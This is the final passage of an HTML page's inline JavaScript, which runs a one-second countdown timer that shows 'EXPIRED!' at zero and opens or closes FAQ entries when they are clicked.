        countdownElement.textContent = "EXPIRED!";
        return;
      }
      totalSeconds--;
      let hours = Math.floor(totalSeconds / 3600);
      let minutes = Math.floor((totalSeconds % 3600) / 60);
      let seconds = totalSeconds % 60;

      if (hours < 10) hours = "0" + hours;
      if (minutes < 10) minutes = "0" + minutes;
      if (seconds < 10) seconds = "0" + seconds;
      countdownElement.textContent = hours + ":" + minutes + ":" + seconds;
    }
    setInterval(updateCountdown, 1000);
    updateCountdown(); // initial call

    // Simple FAQ toggling
    document.querySelectorAll('.faq-item').forEach(item => {
      item.addEventListener('click', () => {
        item.classList.toggle('open');
      });
    });
  </script>
</body>
</html>
